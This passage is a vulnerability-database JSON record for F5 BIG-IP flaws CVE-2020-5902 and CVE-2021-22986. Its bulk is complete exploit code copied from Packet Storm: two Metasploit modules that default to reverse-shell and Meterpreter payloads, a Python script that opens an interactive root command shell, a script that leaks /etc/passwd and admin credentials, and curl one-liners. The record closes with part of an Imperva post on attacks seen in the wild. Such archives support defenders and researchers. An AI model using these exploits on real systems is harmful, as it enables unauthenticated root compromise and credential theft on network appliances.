"NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-07T00:00:00", "type": "attackerkb", "title": "CVE-2020-15506", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15505", "CVE-2020-15506", "CVE-2020-5902"], "modified": "2020-09-18T00:00:00", "id": "AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "href": "https://attackerkb.com/topics/nPl8YRkKRb/cve-2020-15506", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-04-01T14:39:17", "description": "", "cvss3": {}, "published": "2021-04-01T00:00:00", "type": "packetstorm", "title": "F5 iControl Server-Side Request Forgery / Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22986"], "modified": "2021-04-01T00:00:00", "id": "PACKETSTORM:162059", "href": "https://packetstormsecurity.com/files/162059/F5-iControl-Server-Side-Request-Forgery-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 iControl REST Unauthenticated SSRF Token Generation RCE', \n'Description' => %q{ \nThis module exploits a pre-auth SSRF in the F5 iControl REST API's \n/mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that \ncan be used to execute root commands on an affected BIG-IP or BIG-IQ \ndevice. This vulnerability is known as CVE-2021-22986. 
\n \nCVE-2021-22986 affects the following BIG-IP versions: \n \n* 12.1.0 - 12.1.5 \n* 13.1.0 - 13.1.3 \n* 14.1.0 - 14.1.3 \n* 15.1.0 - 15.1.2 \n* 16.0.0 - 16.0.1 \n \nAnd the following BIG-IQ versions: \n \n* 6.0.0 - 6.1.0 \n* 7.0.0 \n* 7.1.0 \n \nTested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion. \n}, \n'Author' => [ \n'wvu', # Analysis and exploit \n'Rich Warren' # First blood (RCE) and endpoint collaboration \n], \n'References' => [ \n['CVE', '2021-22986'], \n['URL', 'https://support.f5.com/csp/article/K03009991'], \n['URL', 'https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311'], \n['URL', 'https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/'] \n# https://clouddocs.f5.com/products/big-iq/mgmt-api/v7.0.0/ApiReferences/bigiq_public_api_ref/r_auth_login.html \n], \n'DisclosureDate' => '2021-03-10', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :bourne, \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session \n'SideEffects' => [ \nIOC_IN_LOGS, # /var/log/restjavad.0.log (rotated) \nACCOUNT_LOCKOUTS, # Unlikely with bigipAuthCookie \nARTIFACTS_ON_DISK # CmdStager \n] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']), 
\nOptString.new('USERNAME', [true, 'Valid admin username', 'admin']), \nOptString.new('ENDPOINT', [false, 'Custom token generation endpoint']) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5]) \n]) \nend \n \ndef username \ndatastore['USERNAME'] \nend \n \ndef user_reference_endpoint \nnormalize_uri(target_uri.path, '/mgmt/shared/authz/users', username) \nend \n \ndef check \ngenerate_token_ssrf ? CheckCode::Vulnerable : CheckCode::Safe \nend \n \ndef exploit \nreturn unless (@token ||= generate_token_ssrf) \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef generate_token_ssrf \nprint_status('Generating token via SSRF...') \nvprint_status(\"Username: #{username}\") \nvprint_status(\"Endpoint: #{login_reference_endpoint}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'), \n'ctype' => 'application/json', \n'data' => { \n'username' => username, \n'bigipAuthCookie' => '', \n'authProviderName' => 'local', \n'loginReference' => { \n'link' => \"https://localhost#{login_reference_endpoint}\" \n}, \n'userReference' => { \n'link' => \"https://localhost#{user_reference_endpoint}\" \n} \n}.to_json \n) \n \nunless res&.code == 200 && (@token = res.get_json_document.dig('token', 'token')) \nprint_error('Failed to generate token') \nreturn \nend \n \nprint_good(\"Successfully generated token: #{@token}\") \n@token \nend \n \ndef execute_command(cmd, _opts = {}) \nbash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\" \n \nprint_status(\"Executing command: #{bash_cmd}\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'), \n'ctype' => 'application/json', \n'headers' => { \n'X-F5-Auth-Token' => @token 
\n}, \n'data' => { \n'command' => 'run', \n'utilCmdArgs' => \"-c '#{bash_cmd}'\" \n}.to_json \n}, datastore['CmdExecTimeout']) \n \nunless res \nvprint_warning('Command execution timed out') \nreturn \nend \n \nunless res.code == 200 && res.get_json_document['kind'] == 'tm:util:bash:runstate' \nfail_with(Failure::PayloadFailed, 'Failed to execute command') \nend \n \nprint_good('Successfully executed command') \n \nreturn unless (cmd_result = res.get_json_document['commandResult']) \n \nvprint_line(cmd_result) \nend \n \ndef login_reference_endpoint \nif datastore['ENDPOINT'] \nreturn normalize_uri(target_uri.path, datastore['ENDPOINT']) \nend \n \n@token_generation_endpoint ||= token_generation_endpoints.sample \n \nnormalize_uri(target_uri.path, @token_generation_endpoint) \nend \n \n# Usable token generation endpoints between versions 12.1.4 and 16.0.1 \ndef token_generation_endpoints \n%w[ \n/access/file-path-manager/indexing \n/cm/autodeploy/cluster-software-images/indexing \n/cm/autodeploy/qkview/indexing \n/cm/autodeploy/software-images/indexing \n/cm/autodeploy/software-volume-install/indexing \n/cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/indexing \n/cm/system/authn/providers/tmos/indexing \n/mgmt/shared/analytics/avr-proxy-tasks \n/mgmt/shared/gossip \n/mgmt/shared/gossip-peer-refresher \n/mgmt/shared/identified-devices/config/device-refresh \n/mgmt/shared/save-config \n/mgmt/tm/shared/bigip-failover-state \n/shared/analytics/avr-proxy-tasks \n/shared/analytics/avr-proxy-tasks/indexing \n/shared/analytics/event-aggregation-tasks/indexing \n/shared/analytics/event-analysis-tasks/indexing \n/shared/authn/providers/local/groups/indexing \n/shared/authz/remote-resources/indexing \n/shared/authz/resource-groups/indexing \n/shared/authz/roles/indexing \n/shared/authz/tokens/indexing \n/shared/chassis-framework-upgrades/indexing \n/shared/device-discovery-tasks/indexing \n/shared/device-group-key-pairs/indexing 
\n/shared/echo/indexing \n/shared/framework-info-tasks/indexing \n/shared/framework-upgrades/indexing \n/shared/gossip \n/shared/gossip-peer-refresher \n/shared/group-task/indexing \n/shared/iapp/blocks/indexing \n/shared/iapp/build-package/indexing \n/shared/iapp/health-prefix-map/indexing \n/shared/iapp/package-management-tasks/indexing \n/shared/iapp/template-loader/indexing \n/shared/identified-devices/config/device-refresh \n/shared/nodejs/loader-path-config/indexing \n/shared/package-deployments/indexing \n/shared/resolver/device-groups/indexing \n/shared/resolver/device-groups/tm-shared-all-big-ips/devices/indexing \n/shared/root-framework-upgrades/indexing \n/shared/rpm-tasks/indexing \n/shared/save-config \n/shared/snapshot-task/indexing \n/shared/snapshot/indexing \n/shared/stats-information/indexing \n/shared/storage/tasks/indexing \n/shared/task-scheduler/scheduler/indexing \n/shared/tmsh-shell/indexing \n/tm/analytics/afm-sweeper/generate-report/indexing \n/tm/analytics/afm-sweeper/report-results/indexing \n/tm/analytics/application-security-anomalies/generate-report/indexing \n/tm/analytics/application-security-anomalies/report-results/indexing \n/tm/analytics/application-security-network/generate-report/indexing \n/tm/analytics/application-security-network/report-results/indexing \n/tm/analytics/application-security/generate-report/indexing \n/tm/analytics/application-security/report-results/indexing \n/tm/analytics/asm-bypass/generate-report/indexing \n/tm/analytics/asm-bypass/report-results/indexing \n/tm/analytics/asm-cpu/generate-report/indexing \n/tm/analytics/asm-cpu/report-results/indexing \n/tm/analytics/asm-memory/generate-report/indexing \n/tm/analytics/asm-memory/report-results/indexing \n/tm/analytics/cpu/generate-report/indexing \n/tm/analytics/cpu/report-results/indexing \n/tm/analytics/disk-info/generate-report/indexing \n/tm/analytics/disk-info/report-results/indexing \n/tm/analytics/dns/generate-report/indexing 
\n/tm/analytics/dns/report-results/indexing \n/tm/analytics/dos-l3/generate-report/indexing \n/tm/analytics/dos-l3/report-results/indexing \n/tm/analytics/http/generate-report/indexing \n/tm/analytics/http/report-results/indexing \n/tm/analytics/ip-intelligence/generate-report/indexing \n/tm/analytics/ip-intelligence/report-results/indexing \n/tm/analytics/ip-layer/generate-report/indexing \n/tm/analytics/ip-layer/report-results/indexing \n/tm/analytics/lsn-pool/generate-report/indexing \n/tm/analytics/lsn-pool/report-results/indexing \n/tm/analytics/memory/generate-report/indexing \n/tm/analytics/memory/report-results/indexing \n/tm/analytics/network/generate-report/indexing \n/tm/analytics/network/report-results/indexing \n/tm/analytics/pem/generate-report/indexing \n/tm/analytics/pem/report-results/indexing \n/tm/analytics/proc-cpu/generate-report/indexing \n/tm/analytics/proc-cpu/report-results/indexing \n/tm/analytics/protocol-security-http/generate-report/indexing \n/tm/analytics/protocol-security-http/report-results/indexing \n/tm/analytics/protocol-security/generate-report/indexing \n/tm/analytics/protocol-security/report-results/indexing \n/tm/analytics/sip/generate-report/indexing \n/tm/analytics/sip/report-results/indexing \n/tm/analytics/swg-blocked/generate-report/indexing \n/tm/analytics/swg-blocked/report-results/indexing \n/tm/analytics/swg/generate-report/indexing \n/tm/analytics/swg/report-results/indexing \n/tm/analytics/tcp-analytics/generate-report/indexing \n/tm/analytics/tcp-analytics/report-results/indexing \n/tm/analytics/tcp/generate-report/indexing \n/tm/analytics/tcp/report-results/indexing \n/tm/analytics/udp/generate-report/indexing \n/tm/analytics/udp/report-results/indexing \n/tm/analytics/vcmp/generate-report/indexing \n/tm/analytics/vcmp/report-results/indexing \n/tm/analytics/virtual/generate-report/indexing \n/tm/analytics/virtual/report-results/indexing \n/tm/shared/bigip-failover-state \n/tm/shared/sys/backup/indexing \n] \nend 
\n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162059/f5_icontrol_rest_ssrf_rce.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-02T14:19:05", "description": "", "cvss3": {}, "published": "2021-04-02T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP 16.0.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22986"], "modified": "2021-04-02T00:00:00", "id": "PACKETSTORM:162066", "href": "https://packetstormsecurity.com/files/162066/F5-BIG-IP-16.0.x-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated) \n# Exploit Author: Al1ex \n# Vendor Homepage: https://www.f5.com/products/big-ip-services \n# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2 \n# CVE : CVE-2021-22986 \n \nimport requests \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nimport sys \n \n \ndef title(): \nprint(''' \n______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ \n/ |\\ \\ / / | ____| |__ \\ / _ \\ |__ \\ /_ | |__ \\ |__ \\ / _ \\ / _ \\ / / \n| ,----' \\ \\/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ \n| | \\ / | __| |______/ / | | | | / / | | |______/ / / / \\__, | > _ < | '_ \\ \n| `----. 
\\ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | \n\\______| \\__/ |_______| |____| \\___/ |____| |_| |____| |____| /_/ \\___/ \\___/ \n \nAuthor:Al1ex@Heptagram \nGithub:https://github.com/Al1ex \n''') \n \ndef exploit(url): \ntarget_url = url + '/mgmt/shared/authn/login' \ndata = { \n\"bigipAuthCookie\":\"\", \n\"username\":\"admin\", \n\"loginReference\":{\"link\":\"/shared/gossip\"}, \n\"userReference\":{\"link\":\"https://localhost/mgmt/shared/authz/users/admin\"} \n} \nheaders = { \n\"User-Agent\": \"hello-world\", \n\"Content-Type\":\"application/x-www-form-urlencoded\" \n} \nresponse = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15) \nif \"/mgmt/shared/authz/tokens/\" not in response.text: \nprint('(-) Get token fail !!!') \nprint('(*) Tested Method 2:') \nheader_2 = { \n'User-Agent': 'hello-world', \n'Content-Type': 'application/json', \n'X-F5-Auth-Token': '', \n'Authorization': 'Basic YWRtaW46QVNhc1M=' \n} \ndata_2 = { \n\"command\": \"run\", \n\"utilCmdArgs\": \"-c whoami\" \n} \ncheck_url = url + '/mgmt/tm/util/bash' \ntry: \nresponse2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20) \nif response2.status_code == 200 and 'commandResult' in response2.text: \nwhile True: \ncmd = input(\"(:CMD)> \") \ndata_3 = {\"command\": \"run\", \"utilCmdArgs\": \"-c '%s'\"%(cmd)} \nr = requests.post(url=check_url, json=data_3, headers=header_2, verify=False) \nif r.status_code == 200 and 'commandResult' in r.text: \nprint(r.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', '')) \nelse: \nprint('(-) Not vuln...') \nexit(0) \nexcept Exception: \nprint('ERROR Connect') \nprint('(+) Extract token: %s'%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0])) \nwhile True: \ncmd = input(\"(:CMD)> \") \nheaders = { \n\"Content-Type\": \"application/json\", \n\"X-F5-Auth-Token\": 
\"%s\"%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0]) \n} \ndata_json = { \n\"command\": \"run\", \n\"utilCmdArgs\": \"-c \\'%s\\'\"%(cmd) \n} \nexp_url= url + '/mgmt/tm/util/bash' \nexp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15) \nif exp_req.status_code == 200 and 'commandResult' in exp_req.text: \nprint(exp_req.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', '')) \nelse: \nprint('(-) Not vuln...') \nexit(0) \n \nif __name__ == '__main__': \ntitle() \nif(len(sys.argv) < 2): \nprint('[+] USAGE: python3 %s https://<target_url>\\n'%(sys.argv[0])) \nexit(0) \nelse: \nexploit(sys.argv[1]) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162066/f5bigip16-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-07-28T17:51:18", "description": "", "cvss3": {}, "published": "2020-07-27T00:00:00", "type": "packetstorm", "title": "F5 Big-IP 13.1.3 Build 0.0.6 Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-27T00:00:00", "id": "PACKETSTORM:158581", "href": "https://packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html", "sourceData": "`# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion \n# Date: 2019-08-17 \n# Exploit Author: Carlos E. 
Vieira \n# Vendor Homepage: https://www.f5.com/products/big-ip-services \n# Version: <= 13.1.3 \n# Tested on: BIG-IP 13.1.3 Build 0.0.6 \n# CVE : CVE-2020-5902 \n \n#!/usr/bin/env python \n \nimport requests \nimport sys \nimport time \nimport urllib3 \nimport json \nurllib3.disable_warnings() \n \nglobal target \n \ndef checkTarget(): \n \nr = requests.head(target + \"/tmui/login.jsp\", verify=False) \nif(r.status_code == 200): \nreturn True \nelse: \nreturn False \n \ndef checkVuln(): \n \nr = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\", verify=False) \nif(r.status_code == 200): \n \ndata = json.loads(r.text) \nif(len(data['output']) > 0): \nreturn True \nelse: \nreturn False \n \nelse: \nreturn False \n \ndef leakPasswd(): \nprint(\"[+] Leaking /etc/passwd from server\") \ntime.sleep(2) \nexploit('/etc/passwd') \n \n \ndef leakHosts(): \nprint(\"[+] Leaking /etc/hosts from server\") \ntime.sleep(2) \nexploit('/etc/hosts') \n \ndef leakLicence(): \n \nprint(\"[+] Leaking /config/bigip.license from server\") \ntime.sleep(2) \nexploit('/config/bigip.license') \n \ndef leakAdmin(): \n \nprint(\"[+] Leaking admin credentials from server\") \ntime.sleep(2) \nr = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\", verify=False) \nif(r.status_code == 200): \n \ndata = json.loads(r.text) \nif(len(data['output']) > 0 ): \nprint(data['output']) \nelse: \nprint(\"[X] Admin credentials not found\") \nelse: \nprint(\"[X] Fail to read file\") \n \n \ndef exploit(file): \n \nr = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=\" + file, verify=False) \nif(r.status_code == 200): \ndata = json.loads(r.text) \nprint(data['output']) \nelse: \nprint(\"[X] Fail to read file\") \n \ndef memoryLeak(): \nprint(\"[!] 
Leaking tomcat process from server\") \ntime.sleep(2) \nr = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline\", verify=False) \nif(r.status_code == 200): \ndata = json.loads(r.text) \nif(len(data['output'])>0): \nprint(\"Command: \" + data['output']) \n \ndef main(host): \n \nprint(\"[+] Check target...\") \nglobal target \ntarget = \"https://\" + host \n \ncheck = checkTarget() \nif(check): \nprint(\"[~] Target is available\") \n \nvuln = checkVuln() \nif(vuln): \nprint(\"[+] Target is vulnerable!\") \n \ntime.sleep(1) \nprint(\"[~] Leak information from target!\") \ntime.sleep(1) \nleakPasswd() \nleakHosts() \nleakLicence() \nleakAdmin() \nmemoryLeak() \nelse: \nprint(\"[X] Target is't vulnerable\") \n \nelse: \nprint(\"[x] Target is unavailable\") \n \n \nif __name__ == \"__main__\": \n \nif(len(sys.argv) < 2): \nprint(\"Use: python {} ip/dns\".format(sys.argv[0])) \nelse: \nhost = sys.argv[1] \nmain(host) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158581/f5bigip1313006-lfi.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T08:52:38", "description": "", "cvss3": {}, "published": "2020-07-07T00:00:00", "type": "packetstorm", "title": "BIG-IP TMUI Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T00:00:00", "id": "PACKETSTORM:158333", "href": "https://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html", "sourceData": "`## RCE: \n \ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' \n \n## Read File: \n \ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158333/bigiptmui-exec.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2020-07-08T08:52:38", "description": "", "cvss3": {}, "published": "2020-07-07T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP TMUI Directory Traversal / File Upload / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T00:00:00", "id": "PACKETSTORM:158366", "href": "https://packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE', \n'Description' => %q{ \nThis module exploits a directory traversal in F5's BIG-IP Traffic \nManagement User Interface (TMUI) to upload a shell script and execute \nit as the root user. \n \nVersions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2, \n15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced \nin 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4. \n \nTested on the VMware OVA release of 14.1.2. 
\n}, \n'Author' => [ \n'Mikhail Klyuchnikov', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2020-5902'], \n['URL', 'https://support.f5.com/csp/article/K52145254'], \n['URL', 'https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/'] \n], \n'DisclosureDate' => '2020-06-30', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' \n} \n], \n[ \n'Linux Dropper', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :bourne, \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'WfsDelay' => 5 \n}, \n'Notes' => { \n'Stability' => [SERVICE_RESOURCE_LOSS], # May disrupt the service \n'Reliability' => [UNRELIABLE_SESSION], # Seems a little finicky \n'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptString.new('WritableDir', [true, 'Writable directory', '/tmp']) \n]) \n \n# XXX: https://github.com/rapid7/metasploit-framework/issues/12963 \nimport_target_defaults \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/fileRead.jsp'), \n'vars_post' => { \n'fileName' => '/etc/f5-release' \n} \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check request.') \nend \n \nunless res.code == 200 && /BIG-IP release (?<version>[\\d.]+)/ =~ res.body \nreturn CheckCode::Safe('Target 
did not respond with BIG-IP version.') \nend \n \n# If we got here, the directory traversal was successful \nCheckCode::Vulnerable(\"Target is running BIG-IP #{version}.\") \nend \n \ndef exploit \ncreate_alias \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \n \ndelete_alias if @created_alias \nend \n \ndef create_alias \nprint_status('Creating alias list=bash') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'), \n'vars_post' => { \n'command' => 'create cli alias private list command bash' \n} \n) \n \nunless res && res.code == 200 && res.get_json_document['error'].blank? \nfail_with(Failure::UnexpectedReply, 'Failed to create alias list=bash') \nend \n \n@created_alias = true \n \nprint_good('Successfully created alias list=bash') \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nupload_script(cmd) \nexecute_script \nend \n \ndef upload_script(cmd) \nprint_status(\"Uploading #{script_path}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/fileSave.jsp'), \n'vars_post' => { \n'fileName' => script_path, \n'content' => cmd \n} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, \"Failed to upload #{script_path}\") \nend \n \nregister_file_for_cleanup(script_path) \n \nprint_good(\"Successfully uploaded #{script_path}\") \nend \n \ndef execute_script \nprint_status(\"Executing #{script_path}\") \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'), \n'vars_post' => { \n'command' => \"list #{script_path}\" \n} \n}, 3.5) \nend \n \ndef delete_alias \nprint_status('Deleting alias list=bash') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => 
dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'), \n'vars_post' => { \n'command' => 'delete cli alias private list' \n} \n) \n \nunless res && res.code == 200 && res.get_json_document['error'].blank? \nprint_warning('Failed to delete alias list=bash') \nreturn \nend \n \nprint_good('Successfully deleted alias list=bash') \nend \n \ndef dir_trav(path) \n# PoC courtesy of the referenced F5 advisory: <LocationMatch \".*\\.\\.;.*\"> \nnormalize_uri(target_uri.path, '/tmui/login.jsp/..;', path) \nend \n \ndef script_path \n@script_path ||= \nnormalize_uri(datastore['WritableDir'], rand_text_alphanumeric(8..42)) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158366/f5_bigip_tmui_rce.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2021-04-06T10:29:57", "description": "On March 10th F5 published a [security advisory](<https://support.f5.com/csp/article/K02566623>) containing twenty one CVEs, the most critical one (CVE-2021-22986) can be exploited for unauthenticated remote code execution attacks. In the past week, several security researchers have reverse engineered the Java software patch published by BIG-IP and posted tweets and blogs with detailed POCs.\n\nAs a result, we observed multiple exploitation attempts against our customers in the last 5 days, while 90% of all occurred in the last 48 hours (March 21-22, 2021). 
This is probably due to the publication of a POC written in python, available in a [GitHub](<https://github.com/h4x0r-dz/RCE-Exploit-in-BIG-IP/blob/main/f5_rce.py>) repository.\n\nLooking at the client type of the requests, the vast majority of the attacks were classified as coming from automated software.\n\nSo far, Imperva research lab registered dozens of attacking IPs although the majority of attacks came from a handful of IPs indicating, once again, the usage of an automated software.\n\nThe most targeted industries are Education, Business, Retail and Financial Services, as we can see in the chart below:\n\nThe exploits that were published use different endpoints in the product to allow an unauthenticated user to execute commands using **root privileges**.\n\nWe observed two attack vectors that attempt to execute code on the vulnerable server. The first one is an attack chain that contains an SSRF attack that attempts to gain an authenticated session token as the first level, followed by remote command execution as the second level. Most of the indications of this attack observed by Imperva were pointed to the \u201c/mgmt/shared/auth/login\u201d URL. Another interesting behavior observed is an attacker that attempted to include the \u2018ping\u2019 command as a value in the \u2018FilePath\u2019 parameter, to many different websites, all of them were redirected to the same IP address hosted in Amazon, with nginx server installed with port 80 opened.\n\nThe second attack vector observed was a remote command execution (RCE), that targeted the \u201cmgmt/tm/util/bash\u201d URL, which allows an unauthenticated user to execute commands using the \u2018utilCmdArgs' parameter. In most of the attack attempts of this RCE observed by Imperva, the attacker tried to run \u201ccat /etc/passwd\u201d.\n\nIn several attack attempts, we saw requests containing nslookup to http://<random_domain>.burpcollaborator.net. 
